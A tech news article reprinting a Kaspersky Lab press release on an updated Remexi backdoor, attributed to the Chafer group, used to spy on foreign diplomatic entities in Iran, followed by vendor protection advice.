Kaspersky Lab researchers have detected multiple attempts to infect foreign diplomatic entities in Iran with homebrew spyware. The attacks appear to be using an updated Remexi backdoor. Several legitimate tools were also used during the campaign. The Remexi backdoor is linked to a suspected Farsi-speaking cyberespionage group known as Chafer, previously associated with the cyber-surveillance of individuals in the Middle East. The targeting of embassies could suggest a new focus for the group.

 

The operation highlights how threat actors in emerging regions are mounting campaigns against targets of interest using relatively basic, homebrew malware combined with publically available tools. In this instance, the attackers used an improved version of the Remexi backdoor – a tool that enables remote administration of a victim’s machine.

 

Remexi was first detected in 2015, being used by a cyberespionage group named Chafer for a cyber-surveillance operation targeting individuals and a number of organizations across the Middle East. The act that the backdoor used in the new campaign has code similarities with known Remexi samples, combined with the target victim set means that Kaspersky Lab’s researchers have linked it to Chafer with medium confidence.

 

The newly discovered Remexi malware is able to execute commands remotely and to seize screenshots, browser data including user credentials, login data and history, and any typed text, among other things. The stolen data is exfiltrated using the legitimate Microsoft Background Intelligent Transfer Service (BITS) application – a Windows component designed to enable background Windows updates. The trend towards combining malware with appropriated or legitimate code helps attackers both to save time and resources when creating malware and to make attribution more complicated.

 

“When we talk about likely state-sponsored cyberespionage campaigns, people often imagine advanced operations with complex tools developed by experts. However, the people behind this spyware campaign look more like system administrators than sophisticated threat actors: they know how to code, but their campaign relies more on the creative use of tools that exist already, than on new, advanced features or elaborate architecture of the code.”

 

However, even relatively simple tools can cause significant damage so we urge organizations to protect their valuable information and systems against all level of threats, and to use threat intelligence to understand how the landscape is evolving,” – said Denis Legezo, Security Researcher at Kaspersky Lab.

 

Kaspersky Lab products detect the updated Remexi malware as Trojan.Win32.Remexi and Trojan.Win32.Agent.

 

For more information on Kaspersky Lab’s threat intelligence services please contact: intelreports@kaspersky.com

 

To protect yourself from targeted spyware:

 

  • Use a proven, corporate grade security solution with anti-targeted attack capabilities and threat intelligence, such as Kaspersky Threat Management and Defense solution. It is capable of spotting and catching advanced targeted attacks by analyzing network anomalies and giving cybersecurity teams full visibility over the network and response automation.

 

 

  • Provide your security team with access to up to date threat intelligence data, to keep pace with the latest tactics and tools used by cybercriminals, and enhance security controls already in use.

 

 

Read the full version of the report on Securelist.com.

 


RECOMMENDED ARTICLE FOR TECHWORLD


 
Lenovo Opens Concept Store in Tacloban
Techworld Date Posted: 25 October 2018 2:01 PM | 174 Views
Technology leader, Lenovo, has recently opened its newest concept store in Tacloban City, Leyte, as part of its efforts to bring its services closer to customers in the region and bolster its presence in.... See More
 
Lenovo Opens Concept Store in Tacloban
Techworld Date Posted: 2:01 PM | 174 Views
Technology leader, Lenovo, has recently opened its newest concept store in Tacloban City, Leyte, as part of its efforts to bring its services closer to customers in the region and bolster its presence in...See More

 
Leading the Midrange Game: realme Philippines Brings realme 3 Pro to the Market
Techworld Date Posted: 25 May 2019 4:50 PM | 0 Views
Ready to lead in the midrange smartphone segment, realme Philippines introduces the latest addition to its lineup, the realme 3 Pro. Packed with outstanding smartphone essentials such as optimal system performance, superior cameras and.... See More
 
Leading the Midrange Game: realme Philippines Brings realme 3 Pro to the Market
Techworld Date Posted: 4:50 PM | 0 Views
Ready to lead in the midrange smartphone segment, realme Philippines introduces the latest addition to its lineup, the realme 3 Pro. Packed with outstanding smartphone essentials such as optimal system performance, superior cameras and...See More

 
Plextor M8PeG Spotted in MSI®’s New Gaming Desktop Aegis Ti3
Techworld Date Posted: 31 January 2017 3:35 PM | 5 Views
MSI® has updated its gaming desktop computer lineup at the recent CES 2017. See More
 
Plextor M8PeG Spotted in MSI®’s New Gaming Desktop Aegis Ti3
Techworld Date Posted: 3:35 PM | 5 Views
MSI® has updated its gaming desktop computer lineup at the recent CES 2017See More

 
Nokia 8110 Welcomes WhatsApp to the Store
Techworld Date Posted: 2 May 2019 11:05 AM | 0 Views
HMD Global, the home of Nokia phones, has announced that WhatsApp, the simple, reliable and secure messaging app, is now available on the Nokia 8110. The app can be downloaded from the Store. . See More
 
Nokia 8110 Welcomes WhatsApp to the Store
Techworld Date Posted: 11:05 AM | 0 Views
HMD Global, the home of Nokia phones, has announced that WhatsApp, the simple, reliable and secure messaging app, is now available on the Nokia 8110. The app can be downloaded from the Store. See More

 
Experience the OPPO “Capture the Real You” Roadshow in SM Megamall Fashion Hall
Techworld Date Posted: 26 April 2018 5:04 PM | 4 Views
After the successful Philippine launch of the OPPO F7, the Selfie Expert brand’s latest flagship smartphone, OPPO has shown its commitment to bring the F7 closer to as many Filipinos as possible with its.... See More
 
Experience the OPPO “Capture the Real You” Roadshow in SM Megamall Fashion Hall
Techworld Date Posted: 5:04 PM | 4 Views
After the successful Philippine launch of the OPPO F7, the Selfie Expert brand’s latest flagship smartphone, OPPO has shown its commitment to bring the F7 closer to as many Filipinos as possible with its...See More

 
DJI Introduces Mavic 2 Pro and Mavic 2 Zoom: A New Era for Camera Drones
Techworld Date Posted: 21 September 2018 9:10 AM | 270 Views
DJI, the world’s leader in civilian drones and aerial imaging technology, has introduced a new era for camera drones with two additions to its iconic Mavic series: Mavic 2 Pro, the world’s first drone.... See More
 
DJI Introduces Mavic 2 Pro and Mavic 2 Zoom: A New Era for Camera Drones
Techworld Date Posted: 9:10 AM | 270 Views
DJI, the world’s leader in civilian drones and aerial imaging technology, has introduced a new era for camera drones with two additions to its iconic Mavic series: Mavic 2 Pro, the world’s first drone...See More

 
Spy Spotting – What Careless Mistakes Reveal about Cyberespionage in APAC
Techworld Date Posted: 24 October 2017 10:22 AM | 368 Views
Kaspersky Lab’s Senior Security Researcher Noushin Shabab looks back at major cyberespionage cases that hit the Asia Pacific region to reveal the mistakes committed by cybercriminals that help researchers unmask their identity.   Errors.... See More
 
Spy Spotting – What Careless Mistakes Reveal about Cyberespionage in APAC
Techworld Date Posted: 10:22 AM | 368 Views
Kaspersky Lab’s Senior Security Researcher Noushin Shabab looks back at major cyberespionage cases that hit the Asia Pacific region to reveal the mistakes committed by cybercriminals that help researchers unmask their identity.   Errors...See More

 
Remote Access Nightmare: New Backdoors Increase More Than 40% in 2018
Techworld Date Posted: 11 December 2018 4:24 PM | 180 Views
Out of all the new malicious files detected in 2018, the amount that turned out to be backdoors rose by 44%, while the volume of ransomware increased by 43%.. See More
 
Remote Access Nightmare: New Backdoors Increase More Than 40% in 2018
Techworld Date Posted: 4:24 PM | 180 Views
Out of all the new malicious files detected in 2018, the amount that turned out to be backdoors rose by 44%, while the volume of ransomware increased by 43%.See More

 
Realme Philippines Is the Official Epic Sponsor of the Mobile Legends: Bang Bang Professional League Season 3
Techworld Date Posted: 16 March 2019 10:14 AM | 270 Views
Realme Philippines gears up with the Philippine’s biggest mobile gaming tournament, Mobile Legends: Bang Bang Professional League Season 3 for the most epic gaming season yet.. See More
 
Realme Philippines Is the Official Epic Sponsor of the Mobile Legends: Bang Bang Professional League Season 3
Techworld Date Posted: 10:14 AM | 270 Views
Realme Philippines gears up with the Philippine’s biggest mobile gaming tournament, Mobile Legends: Bang Bang Professional League Season 3 for the most epic gaming season yet.See More

 
New Variant of SynAck Ransomware Uses Sophisticated Doppelgänging Technique to Evade Security
Techworld Date Posted: 31 May 2018 10:59 AM | 4 Views
Kaspersky Lab researchers have discovered a new variant of the SynAck ransomware Trojan using the Doppelgänging technique to bypass anti-virus security by hiding in legitimate processes. This is the first time the Doppelgänging technique.... See More
 
New Variant of SynAck Ransomware Uses Sophisticated Doppelgänging Technique to Evade Security
Techworld Date Posted: 10:59 AM | 4 Views
Kaspersky Lab researchers have discovered a new variant of the SynAck ransomware Trojan using the Doppelgänging technique to bypass anti-virus security by hiding in legitimate processes. This is the first time the Doppelgänging technique...See More


Power by

Download Free AZ | Free Wordpress Themes